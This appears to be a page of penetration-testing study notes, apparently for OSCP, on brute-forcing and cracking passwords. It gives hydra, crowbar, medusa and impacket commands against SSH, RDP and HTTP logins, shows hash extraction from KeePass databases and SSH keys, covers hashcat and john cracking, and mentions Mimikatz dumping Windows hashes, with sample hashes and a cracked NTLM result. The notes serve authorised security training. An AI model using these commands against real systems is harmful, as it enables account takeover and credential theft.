Brute Force Attacks

Tools

Hashcat

Hashcat Rules:

$ : append a character
^ : prepend a character
c : capitalize the first letter

Apply rules to a wordlist:

hashcat -r demo.rule --stdout demo.txt

Lookup a hash type code:

hashcat --help | grep -i "KeePass"
13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES)         | Password Manager

Hash-Identifier

hash-identifier
> <HASH>

Online Services

SSH

hydra -l username -P /path/to/password/wordlist.txt -s [port] ssh://192.168.x.x

RDP

Brute forcing RDP may end up locking accounts if the security settings are configured to lock out an account on too many wrong attempts

hydra -l username -P /path/to/password/wordlist.txt -s [port] rdp://192.168.x.x

Hydra RDP is not reliably accurate

# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'

Impacket has a much more accurate logon check:

impacket-rdp_check <domain>/<name>:<password>@<IP>

Create a script that checks usernames and passwords given a specific domain and IP

HTTP

HTTP POST form

hydra -l user -P /path/to/password/wordlist.txt 192.168.x.x http-post-form "/index.php:fm_usr=^USER^&fm_pwd=^PASS^:Login failes. Invalid"

HTTP basic authentication

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for https
medusa -h <IP> -u <username> -P  <passwords.txt> -M  http -m DIR:/path/to/auth -T 10
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/

Local Services

KeePass

Transfer the .kdbx database file to your local machine

keepass2john Database.kdbx > keepass.hash

Remove the name of the file from the resulting hash

Database:$keepass$*2*60*0*d74e29a727e9338717d27a7d457ba3486d20dec73a9db1a7fbc7a068c9aec6bd*04b0bfd787898d8dcd4d463ee768e55337ff001ddfac98c961219d942fb0cfba*5273cc73b9584fbd843d1ee309d2ba47*1dcad0a3e50f684510c5ab14e1eecbb63671acae14a77eff9aa319b63d71ddb9*17c3ebc9c4c3535689cb9cb501284203b7c66b0ae2fbf0c2763ee920277496c1

^ remove name

$keepass$*2*60*0*d74e29a727e9338717d27a7d457ba3486d20dec73a9db1a7fbc7a068c9aec6bd*04b0bfd787898d8dcd4d463ee768e55337ff001ddfac98c961219d942fb0cfba*5273cc73b9584fbd843d1ee309d2ba47*1dcad0a3e50f684510c5ab14e1eecbb63671acae14a77eff9aa319b63d71ddb9*17c3ebc9c4c3535689cb9cb501284203b7c66b0ae2fbf0c2763ee920277496c1

Hashcat code for keePass is 13400

hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --foce

SSH Private Key

can be found at /home/user/.ssh/id_rsa

in order to use a private key, needs to have the following permissions applied:

chmod 600 id_rsa

connect to ssh using a private key:

ssh -i id_rsa dave@192.168.50.21

retrieve hash from id_rsa:

ssh2john id_rsa > ssh.hash

(don't forget to remove file name from resulting hash)

kali@kali:~/passwordattacks$ cat ssh.hash
$sshng$6$16$7059e78a8d3764ea1e883fcdf592feb7$1894$6f70656e7373682d6b65792d7631000000000a6165733235362d6374720000000662637279707400000018000000107059e78a8d3764ea1e883fcdf592feb7000000100000000100000197000000077373682...

In this example, the $6$ signified SHA-512

john --wordlist=ssh.passwords ssh.hash

NTLM Cracking

We cannot simple copy, rename, or move the SAM database from C:\Windows\system32\config\sam and we will need to use the Mimikatz tool to bypass this restriction.

Mimikatz also includes the sekurlsa module which extracts password hashes from the Local Security Subsystem (LSASS) process memory. LSASS is a process in Windows that handles user authentication, password changes, and access token creation.

kali@kali:~/passwordattacks$ hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
hashcat (v6.2.5) starting
...
3ae8e5f0ffabb3a627672e1600f1ba10:nicole1                  
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1000 (NTLM)
Hash.Target......: 3ae8e5f0ffabb3a627672e1600f1ba10
Time.Started.....: Thu Jun  2 04:11:28 2022, (0 secs)
Time.Estimated...: Thu Jun  2 04:11:28 2022, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Mod........: Rules (/usr/share/hashcat/rules/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 17926.2 kH/s (2.27ms) @ Accel:256 Loops:77 Thr:1 Vec:8
...

PreviousNote Taking & Reporting For OSCP NextCustom Wordlist Creation

Last updated 1 year ago